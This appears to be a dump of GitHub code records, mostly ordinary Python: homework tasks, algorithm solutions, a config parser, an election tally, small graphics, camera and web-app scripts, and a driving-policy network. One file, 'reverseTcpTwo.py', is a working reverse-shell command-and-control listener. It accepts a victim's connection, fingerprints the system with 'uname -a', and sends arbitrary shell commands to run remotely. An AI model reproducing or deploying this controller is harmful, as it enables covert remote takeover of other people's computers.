+{"seq_id":"49576773381","text":"'''Возьмите любые 1-3 задачи из прошлых домашних заданий. Добавьте к ним логирование ошибок и полезной информации. 
\nТакже реализуйте возможность запуска из командной строки с передачей параметров.'''\n\n'''Взяла задание №1 из семинара 13\nСоздайте функцию, которая запрашивает числовые данные от\nпользователя до тех пор, пока он не введёт целое или\nвещественное число.\nОбрабатывайте не числовые данные как исключения.'''\n\n\nimport logging\nimport sys\n\ndef num_exc():\n while True:\n if len(sys.argv) > 1:\n num = sys.argv[1]\n else:\n num = input('Введите целое или вещественное число: ')\n try:\n num = int(num)\n break\n except ValueError as e:\n try:\n num = float(num)\n break\n except ValueError as e:\n logging.error(f'Ошибка при вводе числа: {e}')\n print(f'Вы ввели неправильное значение: {e}\\nПопробуйте снова!')\n return num\n\nif __name__ == '__main__':\n logging.basicConfig(filename='log.log', level=logging.ERROR, encoding='UTF-8')\n \n print(type(num_exc()))","repo_name":"Lena-Da/Python","sub_path":"seminar15/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72780811616","text":"\"\"\"\nurl: https://leetcode.com/problems/cheapest-flights-within-k-stops/\n* K 경유지 내 가장 저렴한 항공권\n시작점에서 도착점까지의 가장 저렴한 가격을 계산하되, K개의 경유지 이내에 도착하는 가격을 리턴하라.\n경로가 존재하지 않을 경우 -1을 리턴한다.\n- Example 1:\nInput:\n n = 3, edges = [[0,1,100],[1,2,100],[0,2,500]]\n src = 0, dst = 2, k = 0\nOutput: 500\n\"\"\"\nimport collections\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n def findCheapestPrice(self, n: int, flights: List[List[int]], src: int, dst: int, K: int) -> int:\n graph = collections.defaultdict(list)\n # 그래프 인접 리스트 구성\n for f, t, w in flights:\n graph[f].append((t, w))\n\n # 가격, 정점, 소요시간\n Q = [(0, src, K)]\n\n # 우선 순위 큐 최솟값 기준으로 도착점까지 최소 비용 판별\n while Q:\n _price, _node, _k = heapq.heappop(Q)\n if _node == dst:\n return _price\n if _k >= 0:\n for v, w in graph[_node]:\n alt = w + _price\n heapq.heappush(Q, (alt, v, _k - 1))\n\n return -1\n\n\n\nif __name__ == '__main__':\n n = 3\n edges = [[0, 1, 100], [1, 2, 100], [0, 2, 500]]\n src = 0\n dst = 2\n k = 0\n print(Solution().findCheapestPrice(n, edges, src, dst, k), \"||\", 200)\n\"\"\"\n[시작 체크 리스트]\n[] 1시간 지났으나 발상 불가 또는 ��예 다른 길\n[✓] 코드 50% 정도 완성\n[] 1시간 보다 더 걸려서 코드 완성\n[] 코드는 다 돌아가는데 효율성에서 걸림\n[] 코드 완성\n\n[완료 후 체크 리스트]\n[] 아예 모르겠음\n[] 중간 정도 이해함\n[✓] 완벽히 이해함\n\"\"\"","repo_name":"bum12ark/algorithm","sub_path":"python/python-algorithm-intervew/12-graphs/review/41-cheapest-flights-within-k-stops-review.py","file_name":"41-cheapest-flights-within-k-stops-review.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"21151578267","text":"import configparser\nimport logging\nimport os\nimport typing\n\n\nclass ConfigHandler:\n def __init__(self, *, user_mode: bool = False) -> None:\n self.user_mode = user_mode\n\n path = os.path.realpath(__file__)\n parent_dir = os.path.dirname(path)\n project_dir = os.path.dirname(parent_dir)\n\n self.bank_conf_path = os.path.join(project_dir, \"bank2ynab.conf\")\n self.user_conf_path = os.path.join(\n project_dir, \"user_configuration.conf\"\n )\n\n self.config = self.get_configs()\n\n def get_configs(self) -> configparser.RawConfigParser:\n \"\"\"Retrieve all configuration parameters.\"\"\"\n\n conf_files: list[str] = []\n\n if not self.user_mode:\n conf_files.append(self.bank_conf_path)\n conf_files.append(self.user_conf_path)\n try:\n if not os.path.exists(conf_files[0]):\n raise 
FileNotFoundError\n except FileNotFoundError:\n s = f\"Configuration file not found: {conf_files[0]}\"\n logging.error(s)\n raise FileNotFoundError(s)\n else:\n config = configparser.RawConfigParser()\n config.read(conf_files, encoding=\"utf-8\")\n return config\n\n def fix_conf_params(self, section: str) -> dict[str, typing.Any]:\n \"\"\"from a ConfigParser object, return a dictionary of all parameters\n for a given section in the expected format.\n Because ConfigParser defaults to values under [DEFAULT] if present,\n these values should always appear unless the file is really bad.\n\n :param section: name of section in config file to access\n (i.e. bank name, e.g. \"MyBank\" matches \"[MyBank]\" in file)\n :type section: str\n :return: dictionary matching shorthand strings to specified\n values in config\n :rtype: dict\n \"\"\"\n\n bank_config = {\n \"bank_name\": section,\n \"input_columns\": self.get_config_line_lst(\n section, \"Input Columns\", \",\"\n ),\n \"output_columns\": self.get_config_line_lst(\n section, \"Output Columns\", \",\"\n ),\n \"api_columns\": self.get_config_line_lst(\n section, \"API Transaction Fields\", \",\"\n ),\n \"input_filename\": self.get_config_line_str(\n section, \"Source Filename Pattern\"\n ),\n \"path\": self.get_config_line_str(section, \"Source Path\"),\n \"ext\": self.get_config_line_str(\n section, \"Source Filename Extension\"\n ),\n \"encoding\": self.get_config_line_str(section, \"Encoding\"),\n \"regex\": self.get_config_line_boo(\n section, \"Use Regex For Filename\"\n ),\n \"fixed_prefix\": self.get_config_line_str(\n section, \"Output Filename Prefix\"\n ),\n \"output_ext\": self.get_config_line_str(\n section, \"Output Filename Extension\"\n ),\n \"input_delimiter\": self.get_config_line_str(\n section, \"Source CSV Delimiter\"\n ),\n \"header_rows\": self.get_config_line_int(section, \"Header Rows\"),\n \"footer_rows\": self.get_config_line_int(section, \"Footer Rows\"),\n \"date_format\": self.get_config_line_str(section, \"Date Format\"),\n \"date_dedupe\": self.get_config_line_boo(\n section, \"Date De-Duplication\"\n ),\n \"delete_original\": self.get_config_line_boo(\n section, \"Delete Source File\"\n ),\n \"cd_flags\": self.get_config_line_lst(\n section, \"Inflow or Outflow Indicator\", \",\"\n ),\n \"payee_to_memo\": self.get_config_line_boo(\n section, \"Use Payee for Memo\"\n ),\n \"plugin\": self.get_config_line_str(section, \"Plugin\"),\n \"plugin_args\": self.get_config_line_lst(\n section, \"Plugin Arguments\", \"\\n\"\n ),\n \"api_token\": self.get_config_line_str(\n section, \"YNAB API Access Token\"\n ),\n \"api_account\": self.get_config_line_lst(\n section, \"YNAB Account ID\", \"|\"\n ),\n \"currency_mult\": self.get_config_line_flt(\n section, \"Currency Conversion Factor\"\n ),\n }\n\n # quick n' dirty fix for tabs as delimiters\n if bank_config[\"input_delimiter\"] == \"\\\\t\":\n bank_config[\"input_delimiter\"] = \"\\t\"\n\n return bank_config\n\n def get_config_line_str(self, section_name: str, param: str) -> str:\n \"\"\"\n Returns a string value from a given section in the config object.\n\n :param section_name: section to search for parameter\n :type section_name: str\n :param param: parameter to obtain from section\n :type param: str\n :return: value matching parameter\n :rtype: str\n \"\"\"\n return self.config.get(section_name, param)\n\n def get_config_line_int(self, section_name: str, param: str) -> int:\n \"\"\"\n Returns an integer value from a given section in the config object.\n\n :param 
section_name: section to search for parameter\n :type section_name: str\n :param param: parameter to obtain from section\n :type param: str\n :return: value matching parameter\n :rtype: int\n \"\"\"\n return self.config.getint(section_name, param)\n\n def get_config_line_flt(self, section_name: str, param: str) -> float:\n \"\"\"\n Returns a float value from a given section in the config object.\n\n :param section_name: section to search for parameter\n :type section_name: str\n :param param: parameter to obtain from section\n :type param: str\n :return: value matching parameter\n :rtype: float\n \"\"\"\n return self.config.getfloat(section_name, param)\n\n def get_config_line_boo(self, section_name: str, param: str) -> bool:\n \"\"\"\n Returns a bool value from a given section in the config object.\n\n :param section_name: section to search for parameter\n :type section_name: str\n :param param: parameter to obtain from section\n :type param: str\n :return: value matching parameter\n :rtype: bool\n \"\"\"\n return self.config.getboolean(section_name, param)\n\n def get_config_line_lst(\n self, section_name: str, param: str, splitter: str\n ) -> list[typing.Any]:\n \"\"\"\n Returns a list value from a given section in the config object.\n\n :param section_name: section to search for parameter\n :type section_name: str\n :param param: parameter to obtain from section\n :type param: str\n :return: value matching parameter\n :rtype: list\n \"\"\"\n return self.config.get(section_name, param).split(splitter)\n","repo_name":"bank2ynab/bank2ynab","sub_path":"bank2ynab/config_handler.py","file_name":"config_handler.py","file_ext":"py","file_size_in_byte":6943,"program_lang":"python","lang":"en","doc_type":"code","stars":221,"dataset":"github-code","pt":"34"} +{"seq_id":"38775046098","text":"import os\nimport csv\n\ncandidate_list=[]\nvotes_count=[]\nTotal_Votes=0\ncsvpath=os.path.join('Resources','PyPoll_election_data.csv')\n\nwith open(csvpath,'r') as csvfile:\n csvreader=csv.reader(csvfile,delimiter=',')\n header=next(csvreader)\n for rows in csvreader:\n if rows[2] not in candidate_list:\n candidate_list.append(rows[2])\n votes_count.append(0)\n\nwith open(csvpath,'r') as csvfile:\n csvreader=csv.reader(csvfile,delimiter=',')\n header=next(csvreader)\n for rows in csvreader:\n votes_count[candidate_list.index(rows[2])]+=1\n Total_Votes+=1\n\ndef space():\n print(\"-------------------------\")\n\noutput_path=os.path.join('Analysis','PyPoll.txt')\nwith open (output_path, \"w\") as datafile:\n print(\"Election Results\")\n datafile.write(\"Election Results\\n\")\n space()\n datafile.write(\"-------------------------\\n\")\n print(f\"Total Votes: {Total_Votes}\")\n datafile.write(f\"Total Votes: {Total_Votes}\\n\")\n space()\n datafile.write(\"-------------------------\\n\")\n\n winner=candidate_list[0]\n for i in range(len(votes_count)):\n Vote_Percentage=votes_count[i]/Total_Votes\n if votes_count[i]>votes_count[candidate_list.index(winner)]:\n winner=candidate_list[i]\n print(f\"{candidate_list[i]}: {'%.3f%%' % (Vote_Percentage * 100)} ({votes_count[i]})\") #The format of voting_percentage should be in \"%\" and keep 3 decimal points.\n datafile.write(f\"{candidate_list[i]}: {'%.3f%%' % (Vote_Percentage * 100)} ({votes_count[i]})\\n\")\n\n space()\n datafile.write(\"-------------------------\\n\")\n print(f\"Winner: {winner}\")\n datafile.write(f\"Winner: {winner}\\n\")\n space()\n 
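# Note (added): on an exact tie this linear scan keeps the earlier candidate,\n # because only a strictly greater vote count replaces the running winner.\n 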
datafile.write(\"-------------------------\\n\")","repo_name":"FengWang1991/python-challenge","sub_path":"PyPoll/PyPollmain.py","file_name":"PyPollmain.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42474667662","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n url(r'^$', include('game.urls', namespace=\"game\")),\n url(r'^game/', include('game.urls', namespace=\"game\")),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login', {'template_name': 'login.html'}),\n url(r'^accounts/logout/$', 'django.contrib.auth.views.logout', {'template_name': 'logout.html'}),\n)\n","repo_name":"mrchaarlie/Curio-X","sub_path":"curiox/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"32281135974","text":"import cv2\n\ncamera = cv2.VideoCapture(0)\n\nwhile True:\n success, frame = camera.read()\n\n if not success:\n break\n else:\n print(frame.shape)\n cv2.imshow('Video Output', frame)\n\n # Breaking the loop if 'q' is pressed\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Releasing camera\ncamera.release()\n# Destroying all opened OpenCV windows\ncv2.destroyAllWindows()","repo_name":"hieu-tyler/capstone-object-detection","sub_path":"socket/frontend/test_camera.py","file_name":"test_camera.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"826696935","text":"import pygame as pg\nfrom config import *\n\n\nclass Tile(pg.sprite.Sprite):\n def __init__(self, x, y):\n super().__init__()\n self.image = pg.Surface((TILE_SET, TILE_SET))\n self.image.fill('red')\n self.rect = self.image.get_rect(topleft=(x, y))\n self.x_scroll = 0\n self.y_scroll = 0\n\n def update(self):\n self.rect.x += self.x_scroll\n self.rect.y += self.y_scroll\n","repo_name":"bruleocruz/RE--Metal-Warriors","sub_path":"tiles.py","file_name":"tiles.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41821764314","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nMel Spectrogram of a dataset\r\n\r\n@author: Chinmay Sinha\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport librosa as lbr\r\n\r\ndef load_signal(filename, enforce_shape=None):\r\n new_input, sample_rate = lbr.load(filename, mono=True)\r\n features = lbr.feature.melspectrogram(new_input, **MEL_KWARGS).T\r\n\r\n if enforce_shape is not None:\r\n if features.shape[0] < enforce_shape[0]:\r\n delta_shape = (enforce_shape[0] - features.shape[0],\r\n enforce_shape[1])\r\n features = np.append(features, np.zeros(delta_shape), axis=0)\r\n elif features.shape[0] > enforce_shape[0]:\r\n features = features[: enforce_shape[0], :]\r\n\r\n features[features == 0] = 1e-6\r\n return (np.log(features), float(new_input.shape[0]) / sample_rate)\r\n","repo_name":"ch1nmayx/Audio_Processing_MarkOne","sub_path":"MFCC.py","file_name":"MFCC.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37353531735","text":"'''Python Pizza Deliveries'''\n\nprint(\"Thank you for choosing Python Pizza Deliveries!\")\n\nsize = input(\"Which size of pizza would you 
like to have? S, M or L? \")\nadd_pepperoni = input(\"Do you want pepperoni on it? Y or N? \")\nextra_cheese = input(\"Would you like to have an extra cheese on your pizza? Y or N? \")\n\nbill = 0\n\nif size == \"S\":\n bill += 15\nelif size == \"M\":\n bill += 20\nelif size == \"L\":\n bill += 25\nelse:\n print(\"Invalid entry! :(\")\n\nif add_pepperoni == \"Y\":\n if size == \"S\":\n bill += 2\n else:\n bill += 3\n\nif extra_cheese == \"Y\":\n bill += 1\nelse:\n pass\n\nprint(f\"Your final bill is: ${bill}.\")\n","repo_name":"mohneeshdaksh/Python-Bootcamp-Projects","sub_path":"If Else Conditions/Python Pizza Deliveries/python_pizza_deliveries.py","file_name":"python_pizza_deliveries.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6628946230","text":"# # \n## 모험가 길드\n\n## Solution\n\n### 문제의 아이디어 생각해낸 포인트\n# 그리디, 오름차순 정렬\n# 공포도가 작은 수끼리 묶여야 적게도 그룹이 생성 가능하므로 많은 그룹 생성 가능 \n\n### 시간 복잡도 계산\n# O(NlogN)\n\n### 입력\nimport sys\nimport random\nimport math\nimport time\ninput = sys.stdin.readline\n\n\ndef solution(array):\n array.sort()\n # 그룹의 인원수와 공포도가 맞아 떨어지면 그룹 수 증가\n # 1/1 2/1 2 \n # 1 2 2 2 3\n\n cnt = 1\n group = 0\n for i in array:\n if cnt == i:\n group += 1\n cnt = 1\n else: cnt += 1\n return group\n\n\nn = int(input())\narray = list(map(int, input().split(\" \")))\nprint(solution(array))\n\n\n# 시간초과 확인 방법\n# time 라이브러리\n# start = time.time()\n\n# #logic\n# array = []\n# # random 라이브러리\n# for i in range(100000):\n# array.append(random.randrange(1,100000))\n# solution(array)\n\n# end = time.time()\n# print(f\"{end - start:.5f} sec\")\n# print(round(end-start,5))\n\n","repo_name":"sujin-park0607/PythonBook","sub_path":"ch03_그리디/실전 문제/sujin/greedy/11-1.py","file_name":"11-1.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17526329951","text":"import re\n\nwith open(\"input.txt\") as fp:\n lines = fp.readlines()\n\nif __name__ == \"__main__\":\n possible_allergies = {}\n all_ingredients = set()\n for line in lines:\n ingredients, allergies = line.strip().strip(\")\").split(\" (contains \")\n ingredients = set(ingredients.split(\" \"))\n all_ingredients = all_ingredients.union(ingredients)\n for allergen in allergies.split(\", \"):\n if allergen in possible_allergies:\n possible_allergies[allergen] = possible_allergies[allergen].intersection(ingredients)\n else:\n possible_allergies[allergen] = ingredients\n allergens = {}\n while len(allergens) < len(possible_allergies):\n for allergen, ingredient_set in possible_allergies.items():\n if len(ingredient_set) == 1:\n for ingredient in ingredient_set:\n break\n allergens[allergen] = ingredient\n for other in possible_allergies:\n if ingredient in possible_allergies[other]:\n possible_allergies[other].remove(ingredient)\n safe = all_ingredients.difference(allergens.values())\n\n with open(\"input.txt\") as fp:\n text = fp.read()\n safe_count = sum(len(re.findall(rf\"\\b{ingredient}\\b\", text)) for ingredient in safe)\n print(safe_count)\n print(f\"Part 2: {','.join(allergens[k] for k in sorted(allergens))}\")\n","repo_name":"Joshua-Tustanowski/advent-of-code","sub_path":"Josh/solutions_2020/day_20/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3824397964","text":"def solution(n):\n dx = [1, 0, -1]\n dy = 
[0, 1, -1]\n    board = [[0] * n for _ in range(n)]\n\n    x = 0\n    y = 0\n    angle = 0  # index over the three direction angles; start at 0 to fill downward first.\n    count = 1\n    board_size_by_filled = n * (n + 1) // 2\n\n    while count <= board_size_by_filled:\n        board[x][y] = count\n\n        # If there is another cell to fill in the current direction, keep the angle and update x, y along it.\n        nx = dx[angle] + x\n        ny = dy[angle] + y\n        count += 1\n\n        if 0 <= nx < n and 0 <= ny < n and board[nx][ny] == 0:\n            x = nx\n            y = ny\n\n        # If the current direction is fully filled, change the angle.\n        else:\n            angle = (angle + 1) % 3  # add 1 and wrap around the three directions\n            x += dx[angle]  # e.g. for n = 4, move from (3,3) to (2,2) along the diagonal\n            y += dy[angle]\n\n    answer = []\n    for i in range(len(board)):\n        for j in range(len(board[i])):\n            answer.append(board[i][j])\n\n    return answer\n\nprint(solution(4))","repo_name":"juni8453/python_practice","sub_path":" problem_solving_strategy/matrix/삼각_달팽이.py","file_name":"삼각_달팽이.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35054001290","text":"import numpy as np\nimport bines2 as bines \n\ndef am(m,x,y,nbin, modo):\n    rcil = np.sqrt(x**2 + y**2)\n    rbin, nodos = bines.rbin1(rcil, nbin)\n    \n    Amv = np.ndarray(nbin)\n    phiv = np.ndarray(nbin)\n    \n    n = len(x)\n    delta = n / nbin\n    \n    r_sort = np.sort(rcil)\n    \n    for j in range(0, nbin):\n        mask, = np.where((rcil > r_sort[j*(delta-1)]) & (rcil <= r_sort[(delta-1)*(j+1)]))\n        \n        xn = x[mask]\n        yn = y[mask]\n        \n        titaj = np.arctan2(yn,xn)\n        \n        a0 = np.sum(m[mask])\n        am = np.sum(m[mask]*np.cos(modo*titaj))\n        bm = np.sum(m[mask]*np.sin(modo*titaj))\n        \n        Amv[j] = np.sqrt(am**2 + bm**2) / a0\n        phiv[j] = np.arctan2(bm,am) / 2.\n        \n\n    return Amv, phiv, rbin\n\n\n","repo_name":"ornemarioni/Barras_GdGs","sub_path":"Barras_Gd/programs/furier_components.py","file_name":"furier_components.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71915659938","text":"\nimport socket,subprocess as sp ,sys,os\nfrom colorama import Fore,Style\n\n\ndef recv_data(connection):\n    response = connection.recv(1024)\n    total_size = long(response[:16])\n    response = response[16:]\n    while total_size > len(response): #start loop\n        data = connection.recv(1024) #to receive the remaining data\n        response += data  #output exceeds 1024 \n    print (Fore.BLUE + \"%s\" %response)\n    print(Fore.RESET)\n\ndef send_data(connection,data):\n    data = data.encode('utf-8')\n    try:\n        connection.send(data)\n        recv_data(connection)\n    except socket.error as e :\n        print(Fore.RED + \"[-] Unable to send data\" + Fore.RESET)\n\ndef console(connection, ip,port):\n    print (Fore.GREEN + \"[Info]\" + Fore.RESET ),\n    print(Fore.BLUE + \" Connection Established from: %s:%s \" %(ip,port))\n    print( Fore.RESET)\n\n    connection.send(\"uname -a\")\n    sysinfo = connection.recv(1024).split(\" \")\n    print (Fore.GREEN + \"Operating System :\" + Fore.RESET ),\n    print(Fore.BLUE + \"%s\" % sysinfo[0])\n    print( Fore.RESET)\n    print (Fore.GREEN + \"Node Name :\" + Fore.RESET ),\n    print(Fore.BLUE + \"%s\" % sysinfo[1])\n    print( Fore.RESET)\n    print (Fore.GREEN + \"Release :\" + Fore.RESET ),\n    print(Fore.BLUE + \"%s\" %sysinfo[2])\n    print( Fore.RESET)\n    print (Fore.GREEN + \"Version :\" + Fore.RESET ),\n    print(Fore.BLUE + \"%s %s %s %s %s\" % (sysinfo[3],sysinfo[4],sysinfo[5],sysinfo[6],sysinfo[7]))\n    print( Fore.RESET)\n    print (Fore.GREEN + \"Machine :\" + Fore.RESET ),\n    print(Fore.BLUE + \"%s\" % sysinfo[8])\n    print( Fore.RESET)\n\n    user = sysinfo[1] +'@'+ip\n    while 1 : #Run a while 
loop to initiate the reverse connection \n        command = raw_input(Fore.RED + '%s >' %user ) #Command to enter on server \n        print( Fore.RESET)\n        if command != \"exit()\" : #if command is not exit(), execute\n            if command != \"\" : #skip empty commands and keep looping ******made changes here*******\n                response = send_data(connection, command)\n                print (\"%s\" %response)\n            elif command == \"\":\n                continue\n        elif command == \"cls\":\n            dp = os.system(\"clear\")\n        elif command == \"exit()\":\n            connection.send(\"exit\")\n            print (Fore.BLUE + \"[+] \" + Fore.RESET),\n            print (Fore.GREEN + \"Shell Going Down\" + Fore.RESET)\n            connection.close()\n        else:\n            print (Fore.RED + \"[!] Unknown command\" + Fore.RESET)\ndef banner():\n    banner = '''\n373737373737373737373737373737373737373737373737373737373737373737373737373737373737373737373737\n7 3\n3 ## ####### # # # 7\n7 # # # # # # 3\n3 # # # # # # | 7\n7 # # # # # # |Author:Fumbani 3\n3 ## # # # #### ####### ##### ##### # # | 7\n7 # # # # # # # # # # # # |Version:1.0 RvsShell 3\n3 # # # # #### # # # #### # # | 7\n7 # # # # # # # # # # # 3\n3 # # # #### ####### # # ##### # # 7\n7 3\n3 7\n737373737373737373737373737373737373737373737373737373737373737373737373737373737373737373737373\n'''\n    return banner\ndef main_control():\n    try:\n        host = sys.argv[1] #attacker's host address, usually ''\n        port = int (sys.argv[2]) #attacker's host port\n    except Exception as e :\n        print (Fore.RED + \"[-] Socket Information Not Provided\" + Fore.RESET)\n        sys.exit(1)\n    print (Fore.GREEN + \"[*]\" + Fore.RESET ),\n    print (Fore.BLUE + \" Framework Started Successfully \" + Fore.RESET)\n    print (Fore.CYAN)\n    #print(banner()) uncomment this line to print the banner\n    print (Fore.RESET)\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #setup socket\n\n    s.bind((host,port)) #Bind the socket\n    s.listen(5) #Max connections: 5\n\n    if host == \"\":\n        host = \"localhost\"\n\n    print(Fore.GREEN + \"[*]\" + Fore.RESET),\n    print(Fore.BLUE + \"Listening on %s:%d ... 
\" %(host,port))\n print(Fore.RESET)\n try:\n conn,addr = s.accept()\n\n sysi = conn.recv(2048).split(\",\")\n \n except KeyboardInterrupt:\n print(Fore.RED + \"[-] User Requested An Interrupt\" + Fore.RESET)\n sys.exit(0)\n\n console(conn,str(addr[0]),str(addr[1]))\n\nif __name__ == '__main__':\n main_control()\n","repo_name":"deadex-ng/pythonReverseShell-oneClient","sub_path":"reverseTcpTwo.py","file_name":"reverseTcpTwo.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40718428443","text":"import pynecone as pc\n\n# openai.api_key = \"YOUR_API_KEY\"\n\nclass State(pc.State):\n pass\n\ndef index():\n return pc.center(\n pc.vstack(\n pc.heading(\"Blade\", font_size=\"1.5em\"),\n pc.input(placeholder=\"Sample Input\"),\n pc.button(\n pc.icon(tag=\"MoonIcon\"),\n on_click=pc.toggle_color_mode,\n ),\n pc.divider(),\n padding=\"2em\",\n shadow=\"lg\",\n border_radius=\"lg\",\n ),\n width=\"100%\",\n height=\"100vh\",\n font_family=\"Inter\",\n bg=\"radial-gradient(circle at 22% 11%,rgba(62, 180, 137,.20),hsla(0,0%,100%,0) 19%)\",\n )\n\n# Add state and page to the app.\napp = pc.App(state=State)\napp.add_page(index, title=\"Pynecone:Blade\")\napp.compile()","repo_name":"afk-echo/blade-cc","sub_path":"Blade_Web/Blade_Web.py","file_name":"Blade_Web.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13321962175","text":"import numpy\nimport time\nimport os\n\n\nclass CG:\n def __init__(self, x=25, y=25, bgchar=\"-\"):\n \"\"\"A Basic implementation of Pixels on screen in\n simple array format to try somebasic computer graphics algorithms\n\n Parameters:\n -----------\n x: (int) Maximum x coordinate\n y: (int) Maximum y coordinate\n bgchar: (str) A char to fill the background\"\"\"\n\n self.width = x\n self.height = y\n self.pixelmatrix = numpy.full((y, x), bgchar)\n\n def putpixel(self, x, y, putchar=\"@\"):\n \"\"\"Puts a char at the given x y coordinate\n\n Parameters:\n -----------\n x: (int) x coordinate of pixel\n y: (int) y coordinate of pixel\n putchar: (str) A char to put at that pixel\n take_origin: (bool) translate origin to center of the window\n \"\"\"\n try:\n self.pixelmatrix[y][x] = putchar\n except:\n print(\"Error!\")\n\n def getpixel(self, x, y):\n \"\"\"Gets a char at the given x y coordinate\n\n Parameters:\n -----------\n x: (int) x coordinate of pixel\n y: (int) y coordinate of pixel\n \"\"\"\n try:\n return self.pixelmatrix[y][x]\n except:\n print(\"Error!\")\n\n def show(self):\n \"\"\"Shows the Pixel Matrix\"\"\"\n for i in self.pixelmatrix:\n for j in i:\n print(j, end=\"\")\n print()\n\n def run(self, speed=0.25):\n \"\"\"Loops the Pixel Matrix by some delay\n\n Parameters:\n -----------\n speed: (float) delay between the showing the pixel matrix\"\"\"\n\n os.system(\"clear\")\n self.show()\n time.sleep(speed)\n","repo_name":"ganimtron-10/ComputerPyGraphics","sub_path":"ComputerPyGraphics.py","file_name":"ComputerPyGraphics.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20277312122","text":"'''Defines a policy that calculates a control signal from an image.\n'''\n\nfrom cnn import create_cnn, calculate_cnn_output\nfrom nn_utilities import update_model_weights\nfrom rnn import create_rnn, calculate_rnn_output\n\n\nclass CNNRNNPolicy(object):\n def 
__init__(self, cnn_weights=None):\n        # Create the ConvNet and load the pretrained weights if provided\n        self.cnn = create_cnn()\n        if cnn_weights is not None:\n            update_model_weights(self.cnn, cnn_weights)\n        # Create the RNN\n        self.rnn = create_rnn()\n\n    def rnn_output(self, percept):\n        # Feed the image through the ConvNet to get a low dimensional feature\n        # vector. Returns a vector in R3 for use in control.\n        feature_vector = calculate_cnn_output(self.cnn,\n                                              percept.reshape(1, 1, 64, 64))\n\n        # Feed the feature vector into the RNN and compute a control signal\n        # from its output\n        rnn_out = calculate_rnn_output(self.rnn,\n                                       feature_vector.reshape(1, 1, 3))\n\n        return rnn_out\n\n    def control_signal(self, rnn_out):\n        \"\"\"\n        Given an output from the RNN calculate the control signals:\n        acceleration/braking and turn angle\n\n        Let rnn_output = [o1, o2, o3]. Then, we calculate:\n\n        signal_steering = (o1 + o2) / 2\n            Between -1 (full left) and +1 (full right)\n\n        signal_acceleration = o3\n            Between -1 (full brake) and +1 (full throttle)\n\n        Returns a pair: signal_steering, signal_acceleration\n        \"\"\"\n        signal_steering = (rnn_out[0] + rnn_out[1]) / 2\n        signal_acceleration = rnn_out[2]\n\n        # Restrict steering to the range [-1, 1]\n        if signal_steering < -1:\n            signal_steering = -1\n        elif signal_steering > 1:\n            signal_steering = 1\n\n        # Restrict acceleration to the range [0, 1]\n        if signal_acceleration < 0:\n            signal_acceleration = 0\n        elif signal_acceleration > 1:\n            signal_acceleration = 1\n\n        return signal_steering, signal_acceleration\n","repo_name":"cosmoharrigan/neuroevolution","sub_path":"neuroevolution/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"34"} +{"seq_id":"23103595681","text":"# !/user/bin/env python3\n\n# Created by Trent Hodgins\n# Created on 10/06/2021\n# This is the RGB program\n# It goes through all the RGB colors\n\n\ndef main():\n    # this function prints every RGB color combination\n\n    # process and output\n    counter1 = 0\n    counter2 = 0\n    counter3 = 0\n\n    for counter1 in range(256):\n        for counter2 in range(256):\n            for counter3 in range(256):\n                print(\"RGB({0},{1},{2})\".format(counter1, counter2, counter3))\n\n    print(\"\\nDone\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"trent-hodgins-01/ICS3U-Unit4-06-Python","sub_path":"RGB.py","file_name":"RGB.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38543560748","text":"\r\n# PLEASE NOTE THAT THIS AUTOMATION RELIES ON TAG FETCHING; IF THE SITE CHANGES ITS MARKUP, THE CODE MUST BE UPDATED \r\n# UPLOADING DATE:28-04-2020\r\nfrom selenium import webdriver\r\n# from selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\n# from selenium.webdriver.support import expected_conditions as EC\r\n# from 